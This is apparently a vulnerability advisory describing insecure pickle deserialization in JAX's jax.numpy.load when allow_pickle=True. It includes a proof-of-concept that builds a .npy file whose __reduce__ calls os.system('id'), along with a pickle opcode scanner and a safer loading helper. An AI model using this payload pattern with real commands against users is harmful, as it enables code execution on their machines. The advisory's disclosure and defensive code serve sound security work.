Arbitrary Code Execution in jax.numpy.load via Insecure Deserialization

Summary

The jax.numpy.load function in the JAX library allows arbitrary code execution when it loads a maliciously crafted file with the allow_pickle parameter set to True. jax.numpy.load is a thin wrapper around numpy.load and forwards its arguments unchanged, so with allow_pickle=True the file contents can reach Python's pickle module, which is not safe to use on untrusted data. In current NumPy releases allow_pickle defaults to False, so the issue arises only when the caller opts in.

Vulnerability Details

  • Component: jax.numpy.load
  • File: jax/_src/numpy/lax_numpy.py
  • Vulnerability Type: Insecure Deserialization (CWE-502)
  • Impact: Arbitrary Code Execution (ACE)

The implementation of jax.numpy.load is as follows:

@export
def load(file: IO[bytes] | str | os.PathLike[Any], *args: Any, **kwargs: Any) -> Array:
  # ... (docstring)
  out = np.load(file, *args, **kwargs)
  # ... (post-processing)
  return out

When allow_pickle=True is passed as a keyword argument, it is forwarded to np.load, which then uses pickle.load for object arrays and for files that are neither valid .npy nor .npz data. An attacker can provide a specially crafted file that, when unpickled, executes arbitrary system commands.
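
The mechanism can be illustrated without running anything harmful. The following is a minimal sketch using only the standard library; the class name BenignDemo is hypothetical, and its __reduce__ returns the builtin len rather than a shell command. Unpickling calls the stored function and yields its return value instead of an instance of the class.

```python
import pickle


class BenignDemo:
    """Hypothetical stand-in for an attacker-controlled object."""

    def __reduce__(self):
        # pickle records "call len('abc')" instead of the object's state.
        # A real payload would name a dangerous callable here instead.
        return (len, ("abc",))


payload = pickle.dumps(BenignDemo())

# Unpickling invokes the recorded callable with the recorded arguments.
result = pickle.loads(payload)
print(type(result).__name__, result)
```

Here the loaded value is the integer 3, the result of len("abc"). The loader never consults the BenignDemo class, which is why the victim does not need the attacker's class definition for a payload to run.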

Proof of Concept (PoC)

Steps to Reproduce:

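  1. Create a malicious file using the following script. The file is a raw pickle stream saved with a .npy extension, which np.load hands to pickle.load when allow_pickle=True:
import os
import pickle

class Malicious:
    # pickle calls __reduce__ to learn how to rebuild the object;
    # returning (callable, args) makes the loader call os.system('id').
    def __reduce__(self):
        return (os.system, ('id',))

with open('malicious.npy', 'wb') as f:
    pickle.dump(Malicious(), f)
  2. Load the malicious file using jax.numpy.load with allow_pickle=True:
import jax.numpy as jnp
jnp.load('malicious.npy', allow_pickle=True)
  3. Observe the execution of the id command.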
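
A raw pickle stream like the one produced in step 1 can also be examined without executing it. The sketch below uses the standard library's pickletools.genops to list opcodes that import a global or call a callable. The helper name suspicious_opcodes and the class CallsLen are hypothetical, and the payload is a benign one that calls len. This is a heuristic only: legitimate pickles of NumPy object arrays also contain these opcodes, and a static scan is not a substitute for refusing to unpickle untrusted data.

```python
import pickle
import pickletools

# Opcodes that import a global or call a callable during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def suspicious_opcodes(data: bytes) -> set:
    """Return the import/call opcode names present in a pickle byte string."""
    found = set()
    # genops parses the stream opcode by opcode without executing it.
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.add(opcode.name)
    return found


class CallsLen:
    """Hypothetical benign payload: unpickling would call len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))


flagged = suspicious_opcodes(pickle.dumps(CallsLen()))
plain = suspicious_opcodes(pickle.dumps([1, 2, 3]))
print(sorted(flagged), sorted(plain))
```

The payload that calls a function is flagged with REDUCE plus a global-import opcode, while a plain list of integers produces no flagged opcodes.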

Impact

An attacker can distribute malicious model files or data files with a .npy extension. If a user is persuaded to load such a file using jax.numpy.load(..., allow_pickle=True), the attacker's code runs with the privileges of the user's process, which is typically enough to read or modify the user's data and execute further commands.

Recommendations

  1. Deprecate or restrict allow_pickle: Discourage the use of allow_pickle=True in jax.numpy.load.
  2. Documentation Warning: Add a prominent security warning to the jax.numpy.load docstring, similar to the one in numpy.load.
  3. Safe Alternatives: Encourage users to use safer serialization formats like safetensors or msgpack (as used in Flax/Orbax).
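
As one way to apply these recommendations on the caller's side, the sketch below rejects files that do not start with a NumPy signature and never enables pickle. The helper names sniff_format and load_untrusted are hypothetical and not part of JAX or NumPy. The signature check only gives an early, clearer error; the actual safeguard is allow_pickle=False, because a well-formed .npy file can still hold an object array, which np.load refuses to read in that mode.

```python
import os
import pickle
import tempfile

NPY_MAGIC = b"\x93NUMPY"                      # prefix of every .npy file
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06")   # .npz archives are zip files


def sniff_format(path) -> str:
    """Classify a file as 'npy', 'npz', or 'unknown' from its first bytes."""
    with open(path, "rb") as f:
        head = f.read(len(NPY_MAGIC))
    if head.startswith(NPY_MAGIC):
        return "npy"
    if head.startswith(ZIP_MAGICS):
        return "npz"
    return "unknown"


def load_untrusted(path):
    """Hypothetical helper: refuse non-NumPy files and never enable pickle."""
    if sniff_format(path) == "unknown":
        raise ValueError(f"{path!r} is not a .npy or .npz file")
    # Imported lazily so that sniff_format can be used without JAX installed.
    import jax.numpy as jnp
    return jnp.load(path, allow_pickle=False)


# Demonstrate the signature check on two small temporary files.
with tempfile.TemporaryDirectory() as tmp:
    raw_pickle_path = os.path.join(tmp, "raw_pickle.npy")
    with open(raw_pickle_path, "wb") as f:
        pickle.dump([1, 2, 3], f)             # raw pickle, wrong signature
    header_only_path = os.path.join(tmp, "header_only.npy")
    with open(header_only_path, "wb") as f:
        f.write(NPY_MAGIC + b"\x01\x00")      # signature only, not a loadable array

    raw_pickle_format = sniff_format(raw_pickle_path)
    header_only_format = sniff_format(header_only_path)

print(raw_pickle_format, header_only_format)
```

A raw pickle saved under a .npy name, like the file in the proof of concept, is classified as unknown and rejected before any loader runs.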